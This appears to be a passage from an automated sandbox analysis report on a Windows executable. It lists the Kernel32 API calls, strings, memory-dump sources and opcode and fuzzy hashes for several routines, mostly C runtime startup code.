                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401492), ref: 00434F1A
                  • GetCurrentThreadId.KERNEL32 ref: 00434F22
                  • GetTickCount.KERNEL32 ref: 00434F2A
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401492), ref: 00434F39
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                  • String ID:
                  • API String ID: 1445889803-0
                  • Opcode ID: f561a2a1ff601ee6c7859a29872dd50be33a00075d929d765d6a55f630c1f644
                  • Instruction ID: f7bc71603f04a81c63935044771816937e96b43a236fd86cad57b2ef3405edd7
                  • Opcode Fuzzy Hash: f561a2a1ff601ee6c7859a29872dd50be33a00075d929d765d6a55f630c1f644
                  • Instruction Fuzzy Hash: F1114CB96053018BC300DF79F98964BBBF0FBC8295F15593AE545C6220EA35D8498B96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TlsAlloc.KERNEL32(?,?,?,00428395,?,00427DFF,?,?,?,?,?), ref: 004283D6
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Alloc
                  • String ID: "SomeNone$L0D$L0D
                  • API String ID: 2773662609-2159131741
                  • Opcode ID: 1497f79f04e6e1750858a314dbbda062768102b60c20d440387aed519252a189
                  • Instruction ID: 37cd8943b78928c9a1622235353ab80db14c816b026712fe9552903523fdb641
                  • Opcode Fuzzy Hash: 1497f79f04e6e1750858a314dbbda062768102b60c20d440387aed519252a189
                  • Instruction Fuzzy Hash: D7110631A022319BDB14EF14E54172A73A0AF5072DF6482AED9085F382EF79DC06C7D8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 0042A99C
                  • CloseHandle.KERNEL32(?,?,?), ref: 0042A9B6
                  • GetLastError.KERNEL32(?,?), ref: 0042A9BF
                  • CloseHandle.KERNEL32(?,?,?), ref: 0042A9CC
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Handle$Close$ErrorFileInformationLast
                  • String ID:
                  • API String ID: 4143594976-0
                  • Opcode ID: e54ed1e3327c2e46e0e057b83055ed067e3ed75a88649f845f5507c71140616c
                  • Instruction ID: a478fad1fa8d160f0faecca7a0995487fc2e4a063dea4a08493a17a3c3164923
                  • Opcode Fuzzy Hash: e54ed1e3327c2e46e0e057b83055ed067e3ed75a88649f845f5507c71140616c
                  • Instruction Fuzzy Hash: 5C014572A043006BE711AB358C017EBB3A8EFC4328F111A2AE85143201EB39A84686D0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(?,00428213,?,?,?,?,?,004281C2,?,?,00428105,?,?,?,?,?), ref: 00428096
                  • GetProcAddress.KERNEL32(00000000,00428213), ref: 0042809D
                  Strings
                  • kernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive, xrefs: 00428047
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: kernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive
                  • API String ID: 1646373207-2150369052
                  • Opcode ID: 078879eb287e8e23aa3e4f4d1203e63ae50b1c15410bb8b23bae3dbad58365f9
                  • Instruction ID: c17c941b6ada7ec3a864707e75b572ca622ca579d5b089154bea027fcc34364f
                  • Opcode Fuzzy Hash: 078879eb287e8e23aa3e4f4d1203e63ae50b1c15410bb8b23bae3dbad58365f9
                  • Instruction Fuzzy Hash: 9841D435B0121A8BCB00DF69D8818EEF7B5FF89354B54852ED50567341EB34AC46CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004351B3
                  • Unknown error, xrefs: 00435162
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: fprintf
                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-3474627141
                  • Opcode ID: 22d47143a2b987bb9b39613244b534e54c539987bc223052dd30a8884465633f
                  • Instruction ID: d4144528a54c513315dcbf2587aa9ca618d7fb1fd06f0911d792d2bed7cf689a
                  • Opcode Fuzzy Hash: 22d47143a2b987bb9b39613244b534e54c539987bc223052dd30a8884465633f
                  • Instruction Fuzzy Hash: 9B01E470408B45CBD700AF15E48842AFFF2FF89354F82989DF4C446269CB36D8A8CB4A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 0043578E
                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357B5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357BC
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357DC
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                  • String ID:
                  • API String ID: 682475483-0
                  • Opcode ID: b9b78576eca65b78e612ec21363e32ffcd56a501106207f5f6fc7ca4767c0748
                  • Instruction ID: d18734ff9501067549d1e21b141943c548221a393f359b5a463be24ebb86ec94
                  • Opcode Fuzzy Hash: b9b78576eca65b78e612ec21363e32ffcd56a501106207f5f6fc7ca4767c0748
                  • Instruction Fuzzy Hash: 58F0A479500B148BDB10BF78E98861B7BB8AA85B51F050439DD444B305E734AD09CBAA
                  Uniqueness

                  Uniqueness Score: -1.00%